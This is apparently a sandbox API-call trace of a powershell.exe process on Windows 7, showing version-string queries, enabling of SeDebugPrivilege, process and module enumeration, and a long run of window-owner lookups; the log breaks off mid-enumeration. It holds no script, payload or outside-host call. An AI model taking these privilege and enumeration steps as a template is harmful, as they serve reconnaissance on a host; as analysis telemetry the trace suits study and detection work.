	[0598.373] lstrcpyW (in: lpString1=0x3dcce0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0598.373] CoTaskMemFree (pv=0x3dcce0) 
	[0598.373] VerQueryValueW (in: pBlock=0x2cd72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x1ed8e8, puLen=0x1ed8e0 | out: lplpBuffer=0x1ed8e8*=0x2cd7724, puLen=0x1ed8e0) returned 1
	[0598.373] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0598.373] CoTaskMemAlloc (cb=0x20) returned 0x4548b0
	[0598.373] lstrcpyW (in: lpString1=0x4548b0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0598.373] CoTaskMemFree (pv=0x4548b0) 
	[0598.373] VerQueryValueW (in: pBlock=0x2cd72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x1ed8e8, puLen=0x1ed8e0 | out: lplpBuffer=0x1ed8e8*=0x2cd73cc, puLen=0x1ed8e0) returned 1
	[0598.373] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0598.373] CoTaskMemAlloc (cb=0x66) returned 0x44f140
	[0598.374] lstrcpyW (in: lpString1=0x44f140, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0598.374] CoTaskMemFree (pv=0x44f140) 
	[0598.374] VerQueryValueW (in: pBlock=0x2cd72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x1ed8e8, puLen=0x1ed8e0 | out: lplpBuffer=0x1ed8e8*=0x0, puLen=0x1ed8e0) returned 0
	[0598.374] VerQueryValueW (in: pBlock=0x2cd72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x1ed8e8, puLen=0x1ed8e0 | out: lplpBuffer=0x1ed8e8*=0x0, puLen=0x1ed8e0) returned 0
	[0598.374] VerQueryValueW (in: pBlock=0x2cd72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x1ed8e8, puLen=0x1ed8e0 | out: lplpBuffer=0x1ed8e8*=0x0, puLen=0x1ed8e0) returned 0
	[0598.374] VerQueryValueW (in: pBlock=0x2cd72d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1ed8b8, puLen=0x1ed8b0 | out: lplpBuffer=0x1ed8b8*=0x2cd7374, puLen=0x1ed8b0) returned 1
	[0598.375] CoTaskMemAlloc (cb=0x204) returned 0x404200
	[0598.375] VerLanguageNameW (in: wLang=0x0, szLang=0x404200, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0599.684] CoTaskMemFree (pv=0x404200) 
	[0599.684] VerQueryValueW (in: pBlock=0x2cd72d8, lpSubBlock="\\", lplpBuffer=0x1ed908, puLen=0x1ed900 | out: lplpBuffer=0x1ed908*=0x2cd7300, puLen=0x1ed900) returned 1
	[0599.690] GetCurrentProcessId () returned 0xbb8
	[0599.707] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x1ec830 | out: lpLuid=0x1ec830*(LowPart=0x14, HighPart=0)) returned 1
	[0599.710] GetCurrentProcess () returned 0xffffffffffffffff
	[0599.711] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x1ec850 | out: TokenHandle=0x1ec850*=0x1c4) returned 1
	[0599.712] AdjustTokenPrivileges (in: TokenHandle=0x1c4, DisableAllPrivileges=0, NewState=0x2cdab50*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0599.714] CloseHandle (hObject=0x1c4) returned 1
	[0599.718] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbb8) returned 0x1c4
	[0599.727] EnumProcessModules (in: hProcess=0x1c4, lphModule=0x2cdabb8, cb=0x200, lpcbNeeded=0x1ed868 | out: lphModule=0x2cdabb8, lpcbNeeded=0x1ed868) returned 1
	[0601.181] GetModuleInformation (in: hProcess=0x1c4, hModule=0x13f370000, lpmodinfo=0x2cdae28, cb=0x18 | out: lpmodinfo=0x2cdae28*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0601.182] CoTaskMemAlloc (cb=0x804) returned 0x45fcb0
	[0601.182] GetModuleBaseNameW (in: hProcess=0x1c4, hModule=0x13f370000, lpBaseName=0x45fcb0, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0601.182] CoTaskMemFree (pv=0x45fcb0) 
	[0601.183] CoTaskMemAlloc (cb=0x804) returned 0x45fcb0
	[0601.183] GetModuleFileNameExW (in: hProcess=0x1c4, hModule=0x13f370000, lpFilename=0x45fcb0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0601.183] CoTaskMemFree (pv=0x45fcb0) 
	[0601.184] CloseHandle (hObject=0x1c4) returned 1
	[0601.192] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xbb8) returned 0x1c4
	[0601.193] GetExitCodeProcess (in: hProcess=0x1c4, lpExitCode=0x1ed998 | out: lpExitCode=0x1ed998*=0x103) returned 1
	[0601.201] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12cdb088, Length=0x20000, ResultLength=0x1ed960 | out: SystemInformation=0x12cdb088, ResultLength=0x1ed960*=0x35d18) returned 0xc0000004
	[0601.205] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12cfb0b8, Length=0x38518, ResultLength=0x1ed960 | out: SystemInformation=0x12cfb0b8, ResultLength=0x1ed960*=0x35d18) returned 0x0
	[0602.738] EnumWindows (lpEnumFunc=0x29366ac, lParam=0x0) returned 1
	[0602.780] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x4d0
	[0606.157] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x558
	[0606.157] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x4d0
	[0606.157] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x4d0
	[0606.157] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x4d0
	[0606.157] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x538
	[0607.733] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x4d0
	[0608.687] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x778
	[0609.268] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x778
	[0610.305] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x4d0
	[0610.714] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x4d0
	[0611.573] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x4d0
	[0611.575] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x4d0
	[0612.647] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x4d0
	[0612.852] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x4d0
	[0612.854] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x4d0
	[0612.856] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x4d0
	[0612.857] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x460
	[0618.607] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x4d0
	[0618.613] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x4d0
	[0618.615] GetWindowThreadProcessId (in: hWnd=0x2041c, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x3a8
	[0618.617] GetWindowThreadProcessId (in: hWnd=0x20420, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x1bd0
	[0618.619] GetWindowThreadProcessId (in: hWnd=0x304c0, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x1bfc
	[0619.902] GetWindowThreadProcessId (in: hWnd=0x108b8, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x1a78
	[0619.907] GetWindowThreadProcessId (in: hWnd=0x108b2, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x1b90
	[0619.909] GetWindowThreadProcessId (in: hWnd=0x108ac, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x1b04
	[0619.912] GetWindowThreadProcessId (in: hWnd=0x108a0, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x1b34
	[0620.960] GetWindowThreadProcessId (in: hWnd=0x1088e, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x1b64
	[0621.434] GetWindowThreadProcessId (in: hWnd=0x1087c, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x1bb0
	[0621.438] GetWindowThreadProcessId (in: hWnd=0x204f6, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x1acc
	[0621.442] GetWindowThreadProcessId (in: hWnd=0x1083e, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x1a2c
	[0621.445] GetWindowThreadProcessId (in: hWnd=0x2042c, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x19a8
	[0621.447] GetWindowThreadProcessId (in: hWnd=0x10836, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x1944
	[0621.448] GetWindowThreadProcessId (in: hWnd=0x10826, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x18c8
	[0621.449] GetWindowThreadProcessId (in: hWnd=0x10822, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x18ac
	[0622.788] GetWindowThreadProcessId (in: hWnd=0x1081e, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x18ec
	[0622.793] GetWindowThreadProcessId (in: hWnd=0x1081a, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x1898
	[0622.796] GetWindowThreadProcessId (in: hWnd=0x10810, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xc98
	[0622.800] GetWindowThreadProcessId (in: hWnd=0x1080a, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x153c
	[0622.802] GetWindowThreadProcessId (in: hWnd=0x10806, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x1808
	[0624.672] GetWindowThreadProcessId (in: hWnd=0x10790, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x12a4
	[0624.681] GetWindowThreadProcessId (in: hWnd=0x1078e, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x1740
	[0624.685] GetWindowThreadProcessId (in: hWnd=0x10784, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x16c4
	[0624.688] GetWindowThreadProcessId (in: hWnd=0x107c2, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x1820
	[0624.691] GetWindowThreadProcessId (in: hWnd=0x107b4, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x16ac
	[0624.694] GetWindowThreadProcessId (in: hWnd=0x1079a, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x1858
	[0624.696] GetWindowThreadProcessId (in: hWnd=0x1077e, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x1664
	[0625.440] GetWindowThreadProcessId (in: hWnd=0x10778, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x10b4
	[0625.639] GetWindowThreadProcessId (in: hWnd=0x10774, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x10ac
	[0626.461] GetWindowThreadProcessId (in: hWnd=0x20378, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x10ec
	[0626.931] GetWindowThreadProcessId (in: hWnd=0x10766, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x1068
	[0626.935] GetWindowThreadProcessId (in: hWnd=0x10762, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x17e0
	[0626.941] GetWindowThreadProcessId (in: hWnd=0x1075e, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x102c
	[0626.944] GetWindowThreadProcessId (in: hWnd=0x1075a, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x17a4
	[0626.947] GetWindowThreadProcessId (in: hWnd=0x2035a, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x1050
	[0626.949] GetWindowThreadProcessId (in: hWnd=0x1072c, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x1694
	[0627.863] GetWindowThreadProcessId (in: hWnd=0x1071e, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x1770
	[0629.496] GetWindowThreadProcessId (in: hWnd=0x10710, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x1720
	[0629.712] GetWindowThreadProcessId (in: hWnd=0x10702, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x165c
	[0629.720] GetWindowThreadProcessId (in: hWnd=0x106ca, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x1578
	[0629.723] GetWindowThreadProcessId (in: hWnd=0x204a6, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x16c0
	[0631.236] GetWindowThreadProcessId (in: hWnd=0x106c4, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x161c
	[0631.236] GetWindowThreadProcessId (in: hWnd=0x106c0, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x1638
	[0631.236] GetWindowThreadProcessId (in: hWnd=0x20362, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x15c8
	[0631.236] GetWindowThreadProcessId (in: hWnd=0x106be, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x1554
	[0631.236] GetWindowThreadProcessId (in: hWnd=0x106bc, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x1674
	[0631.236] GetWindowThreadProcessId (in: hWnd=0x106b4, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x1520
	[0631.236] GetWindowThreadProcessId (in: hWnd=0x1068e, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x14bc
	[0631.236] GetWindowThreadProcessId (in: hWnd=0x1067e, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xf8c
	[0631.237] GetWindowThreadProcessId (in: hWnd=0x1066e, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xe9c
	[0631.237] GetWindowThreadProcessId (in: hWnd=0x1065e, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x1434
	[0631.237] GetWindowThreadProcessId (in: hWnd=0x1064e, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x14ec
	[0631.237] GetWindowThreadProcessId (in: hWnd=0x1063e, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xfcc
	[0631.237] GetWindowThreadProcessId (in: hWnd=0x1062e, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x12ac
	[0631.237] GetWindowThreadProcessId (in: hWnd=0x1062a, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x1484
	[0631.237] GetWindowThreadProcessId (in: hWnd=0x10626, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x934
	[0631.237] GetWindowThreadProcessId (in: hWnd=0x10622, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xc0c
	[0631.237] GetWindowThreadProcessId (in: hWnd=0x1061c, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xb08
	[0631.237] GetWindowThreadProcessId (in: hWnd=0x10610, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x948
	[0631.237] GetWindowThreadProcessId (in: hWnd=0x1060c, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x1178
	[0631.238] GetWindowThreadProcessId (in: hWnd=0x105fa, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x13e0
	[0631.238] GetWindowThreadProcessId (in: hWnd=0x105ea, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xcd0
	[0631.238] GetWindowThreadProcessId (in: hWnd=0x105da, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x13fc
	[0631.238] GetWindowThreadProcessId (in: hWnd=0x105c6, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xdc8
	[0631.238] GetWindowThreadProcessId (in: hWnd=0x105b6, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xc18
	[0631.238] GetWindowThreadProcessId (in: hWnd=0x105a6, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xc2c
	[0631.238] GetWindowThreadProcessId (in: hWnd=0x10580, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xa1c
	[0631.238] GetWindowThreadProcessId (in: hWnd=0x10578, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x1244
	[0631.238] GetWindowThreadProcessId (in: hWnd=0x10574, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xdb0
	[0631.238] GetWindowThreadProcessId (in: hWnd=0x20356, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x1398
	[0631.238] GetWindowThreadProcessId (in: hWnd=0x10566, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x1358
	[0631.238] GetWindowThreadProcessId (in: hWnd=0x10562, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x1370
	[0631.238] GetWindowThreadProcessId (in: hWnd=0x1055e, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x1340
	[0631.239] GetWindowThreadProcessId (in: hWnd=0x10558, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x130c
	[0631.239] GetWindowThreadProcessId (in: hWnd=0x10550, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x12c0
	[0631.239] GetWindowThreadProcessId (in: hWnd=0x2053a, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x12e4
	[0631.239] GetWindowThreadProcessId (in: hWnd=0x1051a, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x1270
	[0631.239] GetWindowThreadProcessId (in: hWnd=0x1050a, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x1298
	[0631.239] GetWindowThreadProcessId (in: hWnd=0x104fa, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x120c
	[0631.239] GetWindowThreadProcessId (in: hWnd=0x204d6, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x122c
	[0631.239] GetWindowThreadProcessId (in: hWnd=0x104ce, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x11c4
	[0631.239] GetWindowThreadProcessId (in: hWnd=0x202d6, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x11b0
	[0631.239] GetWindowThreadProcessId (in: hWnd=0x104c8, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x1188
	[0631.239] GetWindowThreadProcessId (in: hWnd=0x104c4, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x1148
	[0631.239] GetWindowThreadProcessId (in: hWnd=0x202e6, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x1160
	[0631.240] GetWindowThreadProcessId (in: hWnd=0x30272, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x10fc
	[0631.240] GetWindowThreadProcessId (in: hWnd=0x104bc, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xe34
	[0631.240] GetWindowThreadProcessId (in: hWnd=0x104ac, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xea4
	[0631.240] GetWindowThreadProcessId (in: hWnd=0x1048e, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x514
	[0631.241] GetWindow (hWnd=0x1048e, uCmd=0x4) returned 0x0
	[0631.241] IsWindowVisible (hWnd=0x1048e) returned 0
	[0631.241] GetWindowThreadProcessId (in: hWnd=0x1047e, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xe48
	[0631.242] GetWindowThreadProcessId (in: hWnd=0x1046e, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xbc8
	[0631.242] GetWindowThreadProcessId (in: hWnd=0x1045e, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xdf8
	[0631.242] GetWindowThreadProcessId (in: hWnd=0x1044c, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x318
	[0631.242] GetWindowThreadProcessId (in: hWnd=0x10440, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xcac
	[0631.242] GetWindowThreadProcessId (in: hWnd=0x10438, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x8bc
	[0631.242] GetWindowThreadProcessId (in: hWnd=0x10434, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xf9c
	[0631.242] GetWindowThreadProcessId (in: hWnd=0x10430, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xf48
	[0631.242] GetWindowThreadProcessId (in: hWnd=0x10414, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xe40
	[0631.242] GetWindowThreadProcessId (in: hWnd=0x10410, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xecc
	[0631.242] GetWindowThreadProcessId (in: hWnd=0x1040c, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xeb8
	[0631.243] GetWindowThreadProcessId (in: hWnd=0x10408, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xe80
	[0631.243] GetWindowThreadProcessId (in: hWnd=0x10404, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xe98
	[0631.243] GetWindowThreadProcessId (in: hWnd=0x10400, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xe60
	[0631.243] GetWindowThreadProcessId (in: hWnd=0x103fc, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xee4
	[0631.243] GetWindowThreadProcessId (in: hWnd=0x103ee, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xf00
	[0631.243] GetWindowThreadProcessId (in: hWnd=0x10398, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xdf0
	[0631.243] GetWindowThreadProcessId (in: hWnd=0x10388, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xe1c
	[0631.243] GetWindowThreadProcessId (in: hWnd=0x10380, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xdd0
	[0631.243] GetWindowThreadProcessId (in: hWnd=0x1036c, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xd94
	[0631.243] GetWindowThreadProcessId (in: hWnd=0x10368, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xd74
	[0631.244] GetWindowThreadProcessId (in: hWnd=0x10364, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xd00
	[0631.244] GetWindowThreadProcessId (in: hWnd=0x1035e, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xcd8
	[0631.244] GetWindowThreadProcessId (in: hWnd=0x20240, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xc84
	[0631.244] GetWindowThreadProcessId (in: hWnd=0x30220, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xca4
	[0631.244] GetWindowThreadProcessId (in: hWnd=0x2010e, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xc64
	[0631.244] GetWindowThreadProcessId (in: hWnd=0x10344, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xc24
	[0631.244] GetWindowThreadProcessId (in: hWnd=0x1032a, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xb84
	[0631.244] GetWindowThreadProcessId (in: hWnd=0x10316, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xbac
	[0631.244] GetWindowThreadProcessId (in: hWnd=0x102f8, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x384
	[0631.244] GetWindowThreadProcessId (in: hWnd=0x102de, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xab8
	[0631.245] GetWindowThreadProcessId (in: hWnd=0x102da, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x33c
	[0631.245] GetWindowThreadProcessId (in: hWnd=0x102d0, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xa44
	[0631.245] GetWindowThreadProcessId (in: hWnd=0x102cc, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xa64
	[0631.245] GetWindowThreadProcessId (in: hWnd=0x102c8, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x8a8
	[0631.245] GetWindowThreadProcessId (in: hWnd=0x102c4, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xaf0
	[0631.245] GetWindowThreadProcessId (in: hWnd=0x102c0, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x88c
